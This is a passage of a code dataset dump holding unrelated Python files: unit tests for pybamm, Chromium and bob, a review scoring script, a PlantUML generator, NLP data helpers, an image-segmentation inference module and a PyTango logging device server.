pybamm.Mesh(\n geometry, model.default_submesh_types, model.default_var_pts\n )\n disc = pybamm.Discretisation(mesh, model.default_spatial_methods)\n disc.process_model(model)\n solver = model.default_solver\n solution = solver.solve(model, t_eval)\n pybamm.QuickPlot(model, mesh, solution)\n\n def test_failure(self):\n with self.assertRaisesRegex(TypeError, \"'models' must be\"):\n pybamm.QuickPlot(1, None, None)\n with self.assertRaisesRegex(TypeError, \"'solutions' must be\"):\n pybamm.QuickPlot(pybamm.BaseModel(), None, 1)\n with self.assertRaisesRegex(ValueError, \"must provide the same\"):\n pybamm.QuickPlot(\n pybamm.BaseModel(),\n None,\n [pybamm.Solution(0, 0, \"\"), pybamm.Solution(0, 0, \"\")],\n )\n\n\nif __name__ == \"__main__\":\n print(\"Add -v for more debug output\")\n import sys\n\n if \"-v\" in sys.argv:\n debug = True\n pybamm.settings.debug_mode = True\n unittest.main()\n","sub_path":"tests/unit/test_quick_plot.py","file_name":"test_quick_plot.py","file_ext":"py","file_size_in_byte":4220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"442283595","text":"import pandas as pd\nimport time\nfrom tqdm import tqdm\nimport operator\n\ndf = pd.read_excel('review.xlsx')\n\nassumed_number_of_restaurants = 1000\n\nassigned_competitor_average_rating = 3.5\n\ncool_score = 0\n\nrestaurants_ratings = dict()\n\nreview_scores = dict()\noptimum_review_scores = dict()\n\nridlist = df['rid'].tolist() \ndata_lines = len(ridlist)\n\ndef get_user_score(number_of_reviews, rating):\n score = number_of_reviews * rating\n return score\n\ndef analyze(n):\n for i in tqdm(range(data_lines)):\n rid = df['rid'][i]\n # numberOfFriends = int(df['user_numberoffriends'][i])\n numberOfReviews = int(df['user_numberofreviews'][i])\n rating = int(df['rating'][i])\n # no_of_useful = int(df['numberofuseful'][i])\n # no_of_funny = int(df['numberoffunny'][i])\n # no_of_cool = int(df['numberofcool'][i])\n\n user_score = get_user_score(numberOfReviews, rating)\n optimum_user_score = get_user_score(numberOfReviews,5)\n if rid in review_scores:\n review_scores[rid] += user_score\n optimum_review_scores[rid] += optimum_user_score\n else:\n review_scores[rid] = user_score\n optimum_review_scores[rid] = optimum_user_score\n\n for rid in review_scores:\n rating = (review_scores[rid]/optimum_review_scores[rid])*5\n restaurants_ratings[rid] = float(\"{0:.2f}\".format(rating))\n top_competitors = dict(sorted(restaurants_ratings.items(), key=operator.itemgetter(1), reverse=True)[:n])\n return restaurants_ratings,top_competitors\n ","sub_path":"review.py","file_name":"review.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"582701456","text":"from tokens import *\n\nimport os\n\n\nclass writeUml:\n\n def __init__(self,sourceCode):\n self.classDict = Lexer(sourceCode).classDict()\n self.file = 'UML.txt'\n\n\n def writeFile(self):\n file = open(self.file,'w')\n file.write(\"title My code\\nscale 2\\n\")\n for classname in self.classDict:\n Class = \"class \"+classname+\" {\"\n file.write(Class+'\\n')\n variables = self.classDict[classname]['class Variables']\n for var in variables:\n datatype,var = var.split()\n variable = \"\\t+ \"+datatype+\" : \"+var\n file.write(variable+\"\\n\")\n methods = self.classDict[classname]['class methods']\n for method in methods:\n datatype,var = method.split()\n method = \"\\t+ \"+datatype+\" : \"+var\n file.write(method+\"\\n\")\n file.write(\"}\\n\")\n for classname in self.classDict:\n if self.classDict[classname]['Inherited'] != \"Base\":\n Classname = self.classDict[classname]\n inherited = self.classDict[classname]['Inherited']\n inherit = inherited+\" <|-- \"+classname\n file.write(inherit+'\\n')\n file.close()\n \n\n\n\n\n def run(self):\n self.writeFile()\n os.system(\"python -m plantuml UML.txt\")\n\n###################################################\n# {\n# class : \n# { \n# classname : student\n# Inhertited : Base\n# classVariables :\n# { \n# string : usn\n# string : name\n# string : branch\n# long : phone\n# } \n# classMethods : \n# { \n# void : read(void)\n# void : print(void)\n# } \n# }\n# }\n############################################################","sub_path":"PlantumlTxt.py","file_name":"PlantumlTxt.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"332204537","text":"#!/usr/bin/env python\n# Copyright 2017 The Chromium Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\nimport itertools\nimport json\nimport os\nimport shutil\nimport sys\nimport tempfile\nimport unittest\n\nTHIS_DIR = os.path.dirname(__file__)\n\nsys.path.insert(\n 0, os.path.abspath(os.path.join(THIS_DIR, '..', '..', '..', 'unittests')))\nimport test_env\n\nsys.path.insert(\n 0, os.path.abspath(os.path.join(THIS_DIR, '..', 'resources')))\nimport standard_isolated_script_merge\n\nfrom testing_support import auto_stub\n\n\nclass StandardIsolatedScriptMergeTest(auto_stub.TestCase):\n\n def setUp(self):\n self.merge_test_results_args = []\n def mock_merge_test_results(results_list):\n self.merge_test_results_args.append(results_list)\n return {\n 'foo': [\n 'bar',\n 'baz',\n ],\n }\n\n self.mock(\n standard_isolated_script_merge.results_merger,\n 'merge_test_results',\n mock_merge_test_results)\n\n self.temp_dir = tempfile.mkdtemp()\n\n def tearDown(self):\n shutil.rmtree(self.temp_dir)\n super(StandardIsolatedScriptMergeTest, self).tearDown()\n\n def test_simple(self):\n\n results = [\n {\n 'result0': ['bar', 'baz'],\n },\n {\n 'result1': {'foo': 'bar'}\n }\n ]\n json_files = [\n os.path.join(self.temp_dir, 'input0.json'),\n os.path.join(self.temp_dir, 'input1.json')\n ]\n\n for result, json_file in itertools.izip(results, json_files):\n with open(json_file, 'w') as f:\n json.dump(result, f)\n\n output_json_file = os.path.join(self.temp_dir, 'output.json')\n exit_code = standard_isolated_script_merge.StandardIsolatedScriptMerge(\n output_json_file, json_files)\n\n self.assertEquals(0, exit_code)\n self.assertEquals(\n [\n [\n {\n 'result0': [\n 'bar', 'baz',\n ],\n },\n {\n 'result1': {\n 'foo': 'bar',\n },\n }\n ],\n ],\n self.merge_test_results_args)\n\n def test_no_jsons(self):\n json_files = []\n output_json_file = os.path.join(self.temp_dir, 'output.json')\n exit_code = standard_isolated_script_merge.StandardIsolatedScriptMerge(\n output_json_file, json_files)\n\n self.assertEquals(0, exit_code)\n self.assertEquals([[]], self.merge_test_results_args)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"scripts/slave/recipe_modules/swarming/unittests/standard_isolated_script_merge_test.py","file_name":"standard_isolated_script_merge_test.py","file_ext":"py","file_size_in_byte":2470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"215468516","text":"from haha import get_url\nfrom urls import url_list\n\ndef main(url):\n result = get_url.delay(url)\n return result\n\ndef run():\n with open('./url.txt', 'r') as f:\n for url in f.readlines():\n main(url.strip('\\n'))\n\nif __name__ == '__main__':\n run()","sub_path":"run_haha.py","file_name":"run_haha.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"639605415","text":"import re\r\n\r\ndef is_balanced(text):\r\n opening = '([{'\r\n closing = ')]}'\r\n stack = []\r\n for char in text:\r\n if char in opening:\r\n stack.append(opening.index(char))\r\n elif char in closing:\r\n if stack and stack[-1] == closing.index(char):\r\n stack.pop()\r\n else:\r\n return False\r\n return (not stack)\r\n\r\ndef max_balanced(text):\r\n #Charcheck\r\n if re.sub(r\"[a-zA-Z{}\\[\\]()]\", \"\", text): return ('Incorrect characters! Accept only brackets and letters')\r\n\r\n #Const\r\n string = text+text\r\n opening = '([{'\r\n closing = ')]}'\r\n error = 0\r\n s_len = len(string)\r\n ss_max = 0\r\n x = 0\r\n y = 0\r\n result = ''\r\n\r\n #First infinite check\r\n new = re.sub(r\"[a-zA-Z]\", \"\", string)\r\n if new[0] in closing and new[len(new)-1] in opening and is_balanced(new[1:len(new)-1]):\r\n if closing.index(new[0]) == opening.index(new[len(new)-1]): error = 1\r\n\r\n #Find max substring\r\n if re.sub(r\"[a-zA-Z{}\\[\\]()]\", \"\", s1): print('Incorrect characters! Accept only brackets and letters')\r\n while x <= s_len and error == 0:\r\n substring = string[x:y]\r\n ss_len = len(substring)\r\n if is_balanced(substring):\r\n if ss_len >= ss_max:\r\n ss_max = ss_len\r\n result = substring\r\n y = y+1\r\n if y > s_len: \r\n x = x+1\r\n y = 0\r\n\r\n #Second infinite check\r\n if result:\r\n if error == 1 or result == string or is_balanced(string.split(result)[1] + string.split(result)[0]): result = 'Infinite'\r\n\r\n return result\r\n\r\n#pytest\r\ndef test_is_balanced():\r\n assert is_balanced('{x[x]x(x)}') == True\r\n assert is_balanced(']x[x]') == False\r\n\r\ndef test_max_balanced():\r\n assert max_balanced('{x[x]x(x)}') == 'Infinite'\r\n assert max_balanced('()}[(x)]{') == 'Infinite'\r\n assert max_balanced('}[(x)]{()') == 'Infinite'\r\n assert max_balanced(']x}[x]') == '[x]'\r\n assert max_balanced('xx}x({') == '{xx}x'\r\n assert max_balanced(')x)x(x[')\r\n\r\n# The End\r\ns1 = 'xx}x({xxxxx'\r\nprint(max_balanced(s1))","sub_path":"Task.py","file_name":"Task.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"346298367","text":"import numpy as np\r\nimport re\r\n\r\n\r\ndef load_word_embedding_matrix(embedding_path, vocab, dim):\r\n word_vocab = []\r\n embedding_matrix = []\r\n word_vocab.extend(['UNK'])\r\n embedding_matrix.append(np.random.uniform(-1.0, 1.0, (1, dim))[0])\r\n print('Reading embeddings...')\r\n with open(embedding_path, 'r') as f:\r\n for line in f:\r\n if line.split()[0] in vocab:\r\n word_vocab.append(line.split()[0])\r\n embedding_matrix.append([float(i) for i in line.split()[1:]])\r\n return {'word_vocab': word_vocab, 'Embedding_matrix': np.reshape(embedding_matrix, [-1, dim]).astype(np.float32)}\r\n\r\n\r\ndef clean_str(string):\r\n \"\"\"\r\n Tokenization/string cleaning for all datasets except for SST.\r\n Original taken from https://github.com/yoonkim/CNN_sentence/blob/master/process_data.py\r\n \"\"\"\r\n string = re.sub(r\"[^A-Za-z0-9(),!?\\'\\`]\", \" \", string)\r\n string = re.sub(r\"\\'s\", \" \\'s\", string)\r\n string = re.sub(r\"\\'ve\", \" \\'ve\", string)\r\n string = re.sub(r\"n\\'t\", \" n\\'t\", string)\r\n string = re.sub(r\"\\'re\", \" \\'re\", string)\r\n string = re.sub(r\"\\'d\", \" \\'d\", string)\r\n string = re.sub(r\"\\'ll\", \" \\'ll\", string)\r\n string = re.sub(r\",\", \" , \", string)\r\n string = re.sub(r\"!\", \" ! \", string)\r\n string = re.sub(r\"\\(\", \" \\( \", string)\r\n string = re.sub(r\"\\)\", \" \\) \", string)\r\n string = re.sub(r\"\\?\", \" \\? \", string)\r\n string = re.sub(r\"\\s{2,}\", \" \", string)\r\n return string.strip().lower()\r\n\r\n\r\ndef removezero(x, y):\r\n nozero = np.nonzero(y)\r\n print('removezero', np.shape(nozero)[-1], len(y))\r\n\r\n if np.shape(nozero)[-1] == len(y):\r\n return np.array(x), np.array(y)\r\n\r\n y = np.array(y)[nozero]\r\n x = np.array(x)\r\n x = x[nozero]\r\n return x, y\r\n\r\n\r\ndef read_file_lines(filename, from_size, line_num):\r\n i = 0\r\n text = []\r\n end_num = from_size + line_num\r\n for line in open(filename):\r\n if i >= from_size:\r\n text.append(line.strip())\r\n i += 1\r\n if i >= end_num:\r\n return text\r\n return text\r\n\r\n\r\ndef load_vocab(doc_list):\r\n vocab = []\r\n for docs in doc_list:\r\n for sentence in docs:\r\n for word in sentence.split():\r\n vocab.append(word.lower())\r\n vocab = list(set(vocab))\r\n return vocab\r\n\r\n\r\ndef load_data_and_labels(filepath):\r\n \"\"\"\r\n Loads data from files, splits the data into words and generates labels.\r\n Returns split sentences and labels.\r\n \"\"\"\r\n\r\n one_hot_labels = []\r\n citation = []\r\n title = []\r\n content = []\r\n with open(filepath, 'r', encoding=\"utf-8\") as f:\r\n for line in f:\r\n parts = line.split('\\t')\r\n if len(parts) != 4:\r\n continue\r\n citation.append(parts[0])\r\n title.append(parts[1])\r\n content.append(parts[2])\r\n if parts[3].startswith('0'):\r\n one_hot_labels.append([0, 1])\r\n else:\r\n one_hot_labels.append([1, 0])\r\n return [citation, title, content, np.array(one_hot_labels)]\r\n\r\n\r\ndef batch_iter(data, batch_size, num_epochs, shuffle=True):\r\n \"\"\"\r\n Generates a batch iterator for a dataset.\r\n \"\"\"\r\n data = np.array(data)\r\n data_size = len(data)\r\n num_batches_per_epoch = int((len(data) - 1) / batch_size) + 1\r\n for epoch in range(num_epochs):\r\n # Shuffle the data at each epoch\r\n if shuffle:\r\n shuffle_indices = np.random.permutation(np.arange(data_size))\r\n shuffled_data = data[shuffle_indices]\r\n else:\r\n shuffled_data = data\r\n for batch_num in range(num_batches_per_epoch):\r\n start_index = batch_num * batch_size\r\n end_index = min((batch_num + 1) * batch_size, data_size)\r\n\r\n # print('epoch = %d,batch_num = %d,start = %d,end_idx = %d' % (epoch,batch_num,start_index,end_index))\r\n yield shuffled_data[start_index:end_index]\r\n\r\n\r\ndef get_text_idx(text, shape_word_vocab, max_document_length):\r\n text_array = np.zeros([len(text), max_document_length], dtype=np.int32)\r\n symbols = {0: 'UNK'}\r\n print('int to vocab')\r\n int_to_vocab = {}\r\n for index_no, word in enumerate(shape_word_vocab):\r\n int_to_vocab[index_no] = word\r\n int_to_vocab.update(symbols)\r\n vocab_to_int = {word: index_no for index_no, word in int_to_vocab.items()}\r\n for i, x in enumerate(text):\r\n words = x.split(\" \")\r\n count = 1\r\n for j, w in enumerate(words):\r\n if count > max_document_length:\r\n break\r\n else:\r\n if w in vocab_to_int:\r\n text_array[i, j] = vocab_to_int[w]\r\n else:\r\n text_array[i, j] = vocab_to_int['UNK']\r\n count = count + 1\r\n return text_array\r\n\r\n\r\nif __name__ == \"__main__\":\r\n x_text, y = load_data_and_labels('F:\\\\pycharm project\\\\CitationRec-master\\\\data\\\\cutclean_label_corpus10000.txt')\r\n print(len(x_text))\r\n","sub_path":"chapter5/net1/data_helper_net1.py","file_name":"data_helper_net1.py","file_ext":"py","file_size_in_byte":4993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"542430619","text":"#!/usr/bin/env python\n# vim: set fileencoding=utf-8 :\n# Laurent El Shafey \n# Sat Sep 1 9:43:00 2012 +0200\n#\n# Copyright (C) 2011-2013 Idiap Research Institute, Martigny, Switzerland\n\n\"\"\"Test trainer package\n\"\"\"\n\nimport os, sys\nimport unittest\nimport bob\nimport random\nimport numpy\n\nclass CGLogRegTest(unittest.TestCase):\n \"\"\"Performs various tests for Linear Logistic Regression.\"\"\"\n\n def test01_cglogreg(self):\n\n # Tests our LLR Trainer.\n positives = numpy.array([\n [1.,1.2,-1.],\n [2.,2.1,2.2],\n [3.,2.9,3.1],\n [4.,3.7,4.],\n [5.,5.2,4.9],\n [6.,6.1,5.9],\n [7.,7.,7.3],\n ], dtype='float64')\n\n negatives = numpy.array([\n [-10.,-9.2,-1.],\n [-5.,-4.1,-0.5],\n [-10.,-9.9,-1.8],\n [-5.,-5.4,-0.3],\n [-10.,-9.3,-0.7],\n [-5.,-4.5,-0.5],\n [-10.,-9.7,-1.2],\n [-5.,-4.8,-0.2],\n ], dtype='float64')\n\n # Expected trained machine\n #weights_ref= numpy.array([[13.5714], [19.3997], [-0.6432]])\n weights_ref= numpy.array([[1.75536], [2.69297], [-0.54142]])\n #bias_ref = numpy.array([55.3255])\n bias_ref = numpy.array([7.26999])\n\n # Features and expected outputs of the trained machine\n feat1 = numpy.array([1.,2.,3.])\n #out1 = 105.7668\n out1 = 12.78703\n feat2 = numpy.array([2.,3.,4.])\n #out2 = 138.0947\n out2 = 16.69394\n\n\n # Trains a machine (method 1)\n T = bob.trainer.CGLogRegTrainer(0.5, 1e-5, 30)\n machine1 = T.train(negatives,positives)\n\n # Makes sure results are good\n self.assertTrue( (abs(machine1.weights - weights_ref) < 2e-4).all() )\n self.assertTrue( (abs(machine1.biases - bias_ref) < 2e-4).all() )\n self.assertTrue( abs(machine1(feat1) - out1) < 2e-4 )\n self.assertTrue( abs(machine1(feat2) - out2) < 2e-4 )\n\n # Trains a machine (method 2)\n machine2 = bob.machine.LinearMachine()\n T.train(machine2, negatives, positives)\n\n # Makes sure results are good\n self.assertTrue( (abs(machine2.weights - weights_ref) < 2e-4).all() )\n self.assertTrue( (abs(machine2.biases - bias_ref) < 2e-4).all() )\n self.assertTrue( abs(machine2(feat1) - out1) < 2e-4 )\n self.assertTrue( abs(machine2(feat2) - out2) < 2e-4 )\n\n # Expected trained machine (with regularization)\n weights_ref= numpy.array([[0.54926], [0.58304], [0.06558]])\n bias_ref = numpy.array([0.27897])\n\n # Trains a machine (method 1)\n T = bob.trainer.CGLogRegTrainer(0.5, 1e-5, 30, 1.)\n machine1 = T.train(negatives, positives)\n\n # Makes sure results are good\n self.assertTrue( (abs(machine1.weights - weights_ref) < 2e-4).all() )\n self.assertTrue( (abs(machine1.biases - bias_ref) < 2e-4).all() )\n\n\n def test02_cglogreg_norm(self):\n # read some real test data;\n # for toy examples the results are quite different...\n\n pos1 = bob.io.load(bob.test.utils.datafile('positives_isv.hdf5', 'bob.trainer.test', 'data'))\n neg1 = bob.io.load(bob.test.utils.datafile('negatives_isv.hdf5', 'bob.trainer.test', 'data'))\n\n pos2 = bob.io.load(bob.test.utils.datafile('positives_lda.hdf5', 'bob.trainer.test', 'data'))\n neg2 = bob.io.load(bob.test.utils.datafile('negatives_lda.hdf5', 'bob.trainer.test', 'data'))\n\n negatives = numpy.vstack((neg1, neg2)).T\n positives = numpy.vstack((pos1, pos2)).T\n\n # Train the machine after mean-std norm\n T = bob.trainer.CGLogRegTrainer(0.5, 1e-10, 10000, mean_std_norm=True)\n machine = T.train(negatives,positives)\n\n # assert that mean and variance are correct\n mean = numpy.mean(numpy.vstack((positives, negatives)), 0)\n std = numpy.std(numpy.vstack((positives, negatives)), 0)\n\n self.assertTrue( (abs(machine.input_subtract - mean) < 1e-10).all() )\n self.assertTrue( (abs(machine.input_divide - std) < 1e-10).all() )\n\n # apply it to test data\n test1 = [1., -50.]\n test2 = [0.5, -86.]\n\n res1 = machine(test1)\n res2 = machine(test2)\n\n # normalize training data\n pos = numpy.vstack([(positives[i] - mean) / std for i in range(len(positives))])\n neg = numpy.vstack([(negatives[i] - mean) / std for i in range(len(negatives))])\n\n # re-train the machine; should give identical results\n T.mean_std_norm = False\n machine = T.train(neg, pos)\n machine.input_subtract = mean\n machine.input_divide = std\n\n # assert that the result is the same\n self.assertTrue( abs(machine(test1) - res1) < 1e-10 )\n self.assertTrue( abs(machine(test2) - res2) < 1e-10 )\n\n if not bob.core.is_debug():\n # try the training without normalization\n machine = T.train(negatives, positives)\n # check that the results are at least approximately equal\n # Note: lower values for epsilon and higher number of iterations improve the stability)\n self.assertTrue( abs(machine(test1) - res1) < 1e-3 )\n self.assertTrue( abs(machine(test2) - res2) < 1e-3 )\n\n\n","sub_path":"python/bob/trainer/test/test_cglogreg.py","file_name":"test_cglogreg.py","file_ext":"py","file_size_in_byte":4845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"594409800","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('stories', '0006_auto_20150601_1058'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='comment',\n name='comment_type',\n field=models.CharField(choices=[('1', 'Comment'), ('2', 'Review')], default='Comment', max_length=64),\n ),\n ]\n","sub_path":"migtations/stories/migrations/0007_comment_comment_type.py","file_name":"0007_comment_comment_type.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"544522915","text":"\n\n#calss header\nclass _CONTRAPTION():\n\tdef __init__(self,): \n\t\tself.name = \"CONTRAPTION\"\n\t\tself.definitions = [u'a device or machine that looks awkward or old-fashioned, especially one that you do not know how to use: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_contraption.py","file_name":"_contraption.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"284534778","text":"from IPython.display import clear_output, Image, display \r\nimport os\r\nimport cv2\r\nimport sys\r\nfrom time import time\r\nimport glob\r\nimport six\r\nimport PIL\r\nfrom PIL import ImageOps \r\nimport random\r\nimport numpy as np\r\nimport tensorflow as tf\r\n\r\n\r\nclass_colors = [(random.randint(0, 255), random.randint(\r\n 0, 255), random.randint(0, 255)) for _ in range(5000)]\r\n \r\n# Default IMAGE_ORDERING = channels_last\r\nIMAGE_ORDERING = \"channels_last\"\r\n\r\n\r\ndef get_colored_segmentation_image(seg_arr, n_classes, colors=class_colors):\r\n output_height = seg_arr.shape[0]\r\n output_width = seg_arr.shape[1]\r\n\r\n seg_img = np.zeros((output_height, output_width, 3))\r\n\r\n for c in range(n_classes):\r\n seg_arr_c = seg_arr[:, :] == c\r\n seg_img[:, :, 0] += ((seg_arr_c)*(colors[c][0])).astype('uint8')\r\n seg_img[:, :, 1] += ((seg_arr_c)*(colors[c][1])).astype('uint8')\r\n seg_img[:, :, 2] += ((seg_arr_c)*(colors[c][2])).astype('uint8')\r\n\r\n return seg_img\r\n\r\n\r\ndef get_legends(class_names, colors=class_colors):\r\n\r\n n_classes = len(class_names)\r\n legend = np.zeros(((len(class_names) * 25) + 25, 125, 3),\r\n dtype=\"uint8\") + 255\r\n\r\n class_names_colors = enumerate(zip(class_names[:n_classes],\r\n colors[:n_classes]))\r\n\r\n for (i, (class_name, color)) in class_names_colors:\r\n color = [int(c) for c in color]\r\n cv2.putText(legend, class_name, (5, (i * 25) + 17),\r\n cv2.FONT_HERSHEY_COMPLEX, 0.5, (0, 0, 0), 1)\r\n cv2.rectangle(legend, (100, (i * 25)), (125, (i * 25) + 25),\r\n tuple(color), -1)\r\n\r\n return legend\r\n\r\n\r\ndef overlay_seg_image(inp_img, seg_img):\r\n orininal_h = inp_img.shape[0]\r\n orininal_w = inp_img.shape[1]\r\n seg_img = cv2.resize(seg_img, (orininal_w, orininal_h), interpolation=cv2.INTER_NEAREST)\r\n\r\n fused_img = (inp_img/2 + seg_img/2).astype('uint8')\r\n return fused_img\r\n\r\n\r\ndef concat_lenends(seg_img, legend_img):\r\n\r\n new_h = np.maximum(seg_img.shape[0], legend_img.shape[0])\r\n new_w = seg_img.shape[1] + legend_img.shape[1]\r\n\r\n out_img = np.zeros((new_h, new_w, 3)).astype('uint8') + legend_img[0, 0, 0]\r\n\r\n out_img[:legend_img.shape[0], : legend_img.shape[1]] = np.copy(legend_img)\r\n out_img[:seg_img.shape[0], legend_img.shape[1]:] = np.copy(seg_img)\r\n\r\n return out_img\r\n\r\n\r\ndef visualize_segmentation(seg_arr, inp_img=None, n_classes=None,\r\n colors=class_colors, class_names=None,\r\n overlay_img=False, show_legends=False,\r\n prediction_width=None, prediction_height=None):\r\n\r\n if n_classes is None:\r\n n_classes = np.max(seg_arr)\r\n\r\n seg_img = get_colored_segmentation_image(seg_arr, n_classes, colors=colors)\r\n\r\n if inp_img is not None:\r\n original_h = inp_img.shape[0]\r\n original_w = inp_img.shape[1]\r\n seg_img = cv2.resize(seg_img, (original_w, original_h), interpolation=cv2.INTER_NEAREST)\r\n\r\n if (prediction_height is not None) and (prediction_width is not None):\r\n seg_img = cv2.resize(seg_img, (prediction_width, prediction_height), interpolation=cv2.INTER_NEAREST)\r\n if inp_img is not None:\r\n inp_img = cv2.resize(inp_img,\r\n (prediction_width, prediction_height))\r\n\r\n if overlay_img:\r\n assert inp_img is not None\r\n seg_img = overlay_seg_image(inp_img, seg_img)\r\n\r\n if show_legends:\r\n assert class_names is not None\r\n legend_img = get_legends(class_names, colors=colors)\r\n\r\n seg_img = concat_lenends(seg_img, legend_img)\r\n\r\n return seg_img\r\n\r\n\r\ndef get_image_array(image_input,\r\n width, height,\r\n imgNorm=\"sub_mean\", ordering='channels_first', read_image_type=1):\r\n \"\"\" Load image array from input \"\"\"\r\n\r\n if type(image_input) is np.ndarray:\r\n # It is already an array, use it as it is\r\n img = image_input\r\n elif isinstance(image_input, six.string_types):\r\n if not os.path.isfile(image_input):\r\n raise DataLoaderError(\"get_image_array: path {0} doesn't exist\"\r\n .format(image_input))\r\n img = cv2.imread(image_input, read_image_type)\r\n else:\r\n raise DataLoaderError(\"get_image_array: Can't process input type {0}\"\r\n .format(str(type(image_input))))\r\n\r\n if imgNorm == \"sub_and_divide\":\r\n img = np.float32(cv2.resize(img, (width, height))) / 127.5 - 1\r\n elif imgNorm == \"sub_mean\":\r\n img = cv2.resize(img, (width, height))\r\n img = img.astype(np.float32)\r\n img = np.atleast_3d(img)\r\n\r\n means = [103.939, 116.779, 123.68]\r\n\r\n for i in range(min(img.shape[2], len(means))):\r\n img[:, :, i] -= means[i]\r\n\r\n img = img[:, :, ::-1]\r\n elif imgNorm == \"divide\":\r\n img = cv2.resize(img, (width, height))\r\n img = img.astype(np.float32)\r\n img = img/255.0\r\n\r\n if ordering == 'channels_first':\r\n img = np.rollaxis(img, 2, 0)\r\n return img\r\n\r\n\r\n\r\ndef predict(model=None, inp=None, out_fname=None,\r\n checkpoints_path=None, overlay_img=False,\r\n class_names=None, show_legends=False, colors=class_colors,\r\n prediction_width=None, prediction_height=None,\r\n read_image_type=1):\r\n\r\n if model is None and (checkpoints_path is not None):\r\n model = model_from_checkpoint_path(checkpoints_path)\r\n\r\n assert (inp is not None)\r\n assert ((type(inp) is np.ndarray) or isinstance(inp, six.string_types)),\\\r\n \"Input should be the CV image or the input file name\"\r\n\r\n if isinstance(inp, six.string_types):\r\n inp = cv2.imread(inp, read_image_type)\r\n\r\n assert (len(inp.shape) == 3 or len(inp.shape) == 1 or len(inp.shape) == 4), \"Image should be h,w,3 \"\r\n\r\n output_width = 256\r\n output_height = 128\r\n input_width = 512\r\n input_height = 256\r\n n_classes = 8\r\n\r\n x = get_image_array(inp, input_width, input_height,\r\n ordering=IMAGE_ORDERING)\r\n pr = model.predict(np.array([x]))[0]\r\n pr = pr.reshape((output_height, output_width, n_classes)).argmax(axis=2)\r\n\r\n seg_img = visualize_segmentation(pr, inp, n_classes=n_classes,\r\n colors=colors, overlay_img=overlay_img,\r\n show_legends=show_legends,\r\n class_names=class_names,\r\n prediction_width=prediction_width,\r\n prediction_height=prediction_height)\r\n\r\n if out_fname is not None:\r\n cv2.imwrite(out_fname, seg_img)\r\n\r\n return pr\r\n\r\n\r\n\r\n\r\ndef init_model():\r\n mobilenet_seg ='./assets'\r\n model = tf.keras.models.load_model(mobilenet_seg)\r\n return model\r\n\r\n\t\r\ndef inference(image, model):\r\n im = cv2.imread(image)\r\n prediction = o= predict(model, inp=image ,out_fname=\"./tmp/out.png\", overlay_img=True, show_legends=True, class_names = [ \"void\", \"flat\", \"construction\",\"object\", \"nature\", \"sky\", \"human\", \"vehicle\"])\r\n return prediction\r\n","sub_path":"segmentor.py","file_name":"segmentor.py","file_ext":"py","file_size_in_byte":7175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"140234762","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"Sending Device server which is logged by ElementLogger and CentralLogger\"\"\"\nimport sys\nimport time\nimport logging\nimport logging.handlers\nimport syslog\nfrom logging.handlers import SysLogHandler\nfrom PyTango import AttrQuality, AttrWriteType, DispLevel, DevState, DebugIt, Database, DbDevInfo, DeviceProxy\nfrom PyTango.server import Device, DeviceMeta, attribute, command, run, device_property\n\nlogger = logging.getLogger(\"Sending\")\nsyslog = SysLogHandler(address='/dev/log', facility='user')\nformatter = logging.Formatter('%(name)s: %(levelname)s %(module)s %(message)r')\nsyslog.setFormatter(formatter)\nlogger.addHandler(syslog)\n\n\"\"\"Sending Device server class\"\"\"\nclass Sending(Device):\n __metaclass__ = DeviceMeta\n\n \"\"\"Attributes for setting logging levels for element storage and central\"\"\"\n elementLoggingLevel = attribute(label=\"ElementLogginglevel\", dtype=int,\n fget=\"get_elementLoggingLevel\",\n fset=\"set_elementLoggingLevel\",\n doc=\"Sets element logging level\")\n\n storageLoggingLevel = attribute(label=\"StorgeLoggingLevel\", dtype=int,\n fget=\"get_storageLoggingLevel\",\n fset=\"set_storageLoggingLevel\",\n doc=\"Sets syslog logging level\")\n\n centralLoggingLevel = attribute(label=\"CentralLoggingLevel\", dtype=int,\n fget=\"get_centralLoggingLevel\",\n fset=\"set_centralLoggingLevel\",\n doc=\"Sets Central logging level\")\n\n def init_device(self):\n Device.init_device(self)\n self.set_state(DevState.STANDBY)\n self.__elementLoggingLevel = 5 \n self.__storageLoggingLevel = 5 \n self.__centralLoggingLevel = 5 \n logger.setLevel(logging.DEBUG)\n\n def get_elementLoggingLevel(self):\n return self.__elementLoggingLevel\n\n def set_elementLoggingLevel(self, elementLoggingLevel):\n self.__elementLoggingLevel = elementLoggingLevel\n return elementLoggingLevel\n\n def get_centralLoggingLevel(self):\n return self.__centralLoggingLevel\n\n def set_centralLoggingLevel(self, centralLoggingLevel):\n self.__centralLoggingLevel = centralLoggingLevel\n return centralLoggingLevel\n\n def 